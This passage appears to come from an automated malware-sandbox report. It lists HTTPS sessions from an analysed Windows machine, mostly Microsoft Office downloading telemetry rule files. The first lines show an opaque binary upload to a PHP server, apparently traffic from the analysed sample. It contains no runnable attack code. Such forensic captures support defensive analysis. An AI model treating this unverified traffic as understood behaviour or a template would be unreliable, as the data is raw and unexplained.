                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: 5a a1 e8 e5 b1 01 a5 b1 fe 07 27 1d 5d e0 45 67 95 c8 a9 46 8a b9 4b b1 ba 6b b4 fa 70 eb d6 0b 5e d0 b8 aa 65 ef 76 b9 c8 bd ef 89 8c 74 2b 8b 07 11 a3 55 f7 f7 47 ae e4 11 ee f4 6d ec a9 0d aa b6 d9 83 e9 57 b7 c7 93 12 d9 f8 1a 73 06 91 4b 82 c9 79 90 f8 31 65 95 92 7d 1a a9 6a 39 4d 96 62 22 22 4b bb b6 35 3a ed 50 8b d6 96 6f 5d a2 6a 35 aa 24 24 35 5b 91 6b 28 2c b2 3c 7d 54 9c 12 84 16 4a 1a f1 71 a5 72 51 91 09 dc aa ef 8e f8 83 5e a2 db 78 42 1a 93 b6 3d 87 a5 9f 76 d3 3e 51 f9 e7 5a f2 01 38 54 94 27 2b 3d a7 34 b2 e0 16 1a d1 81 86 97 ba ff 53 7a c6 60 8b 2e f3 f3 de 1b 23 ba 20 55 89 60 f4 ff 36 80 ad 5b b3 7a e5 40 fb 83 ca 13 ff 5c 52 91 dc a4 f9 c2 16 f5 4e c8 f0 fa 25 55 5d 0c b3 d8 8a ae c5 06 2c 56 d6 cd f7 d8 10 ea e0 06 01 b7 68 28 06
                                                                                                                                                                                                            Data Ascii: Z']EgFKkp^evt+UGmWsKy1e}j9Mb""K5:Po]j5$$5[k(,<}TJqrQ^xB=v>QZ8T'+=4Sz`.# U`6[z@\RN%U],Vh(
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: 93 93 fd ae 12 b7 2a 53 7a 47 b2 d2 d1 30 2a 1c 75 2d 9a 2e cb 0d 4c 13 d6 e1 e8 6f 5f b3 bf 95 d1 03 c1 99 70 de 20 53 34 49 bf 11 7a 66 dd 32 d3 5a 8d ed 57 4f c2 53 0b 37 fd 52 d9 b7 ec 08 ac f1 5b 12 bb 54 65 29 ec d6 f7 58 36 f6 96 5a 80 0d 1c 81 8a 44 c1 ca 5f 36 e5 1c 27 5d 50 0b 73 18 f8 99 3a 9f d8 f7 3d c3 0b 1a 30 ba 61 bd 81 70 02 34 3c 84 f7 ed ba 7a 37 b7 76 3d 98 fd d7 a6 86 4f 46 fa 1a 99 69 12 b6 0d 8e a6 ec fa 6f ca 7d d5 ce 61 77 81 fd 73 5d 72 a4 65 37 22 f5 d7 3c 2c 81 e8 3c de 12 17 5a 63 99 ef e2 84 83 86 9d b1 24 37 06 1c be e7 60 e3 a2 48 47 ff d7 97 4a 29 5c 6d fc 9b 1d d4 34 a5 94 7f ad b6 0d 54 06 f2 c7 cc 33 dd c2 fb 7c 90 2d b5 65 68 6c df 3f d4 ac fd b1 3f 49 8d 21 2b e9 11 89 b4 d6 fd 61 01 3b dc 61 8a 8a cc 0b 17 7b b5 f0
                                                                                                                                                                                                            Data Ascii: *SzG0*u-.Lo_p S4Izf2ZWOS7R[Te)X6ZD_6']Ps:=0ap4<z7v=OFio}aws]re7"<,<Zc$7`HGJ)\m4T3|-ehl??I!+a;a{
                                                                                                                                                                                                            2024-11-21 14:17:29 UTC990INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:29 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ckhsl33vib7fg1vm98r6ppnjo1; expires=Mon, 17-Mar-2025 08:04:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2Fy2X22p40dFCfjWam3v17cFbXH4IWT5NXz%2FhcdreHctHFV5AL0YSID%2Bx46Wd1L2rdxlv8a%2BtYbDkuT50vZkwnAA9xPQcjXC7aa6iNiPe5umALa1VRxpU9cmTmrDNVhj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614da41eb56a57-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1671&sent=290&recv=573&lost=0&retrans=0&sent_bytes=2829&recv_bytes=554103&delivery_rate=1803582&cwnd=231&unsent_bytes=0&cid=a7d3a35839c787bd&ts=3725&x=0"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            47192.168.2.64975613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                            x-ms-request-id: 367ebca4-601e-0070-6762-3ba0c9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141726Z-178bfbc474bpnd5vhC1NYC4vr400000001m000000000c4kg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            48192.168.2.64975813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                            x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141726Z-178bfbc474btvfdfhC1NYCa2en00000001n000000000f44h
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            49192.168.2.64976013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                            x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141726Z-178bfbc474bq2pr7hC1NYCkfgg00000001r000000000efxz
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            50192.168.2.64975913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                            x-ms-request-id: 20c6f849-701e-005c-2e61-3bbb94000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141726Z-178bfbc474bvjk8shC1NYC83ns00000001gg00000000229e
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            51192.168.2.64976213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                            x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141728Z-178bfbc474bh5zbqhC1NYCkdug00000001hg00000000979z
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            52192.168.2.64976413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                            x-ms-request-id: 29297304-901e-0083-6776-3bbb55000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141728Z-1777c6cb754dqf99hC1TEB5nps0000000b40000000004qb9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            53192.168.2.64976313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                            x-ms-request-id: e86b2c91-101e-008e-05a0-3bcf88000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141728Z-r1d97b99577xdmfxhC1TEBqbhg0000000260000000004ffn
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:29 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            54192.168.2.64976513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                            x-ms-request-id: 4eadfa52-701e-0098-578c-3b395f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141728Z-r1d97b99577sdxndhC1TEBec5n0000000ag000000000hq09
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            55192.168.2.64976613.107.246.45443
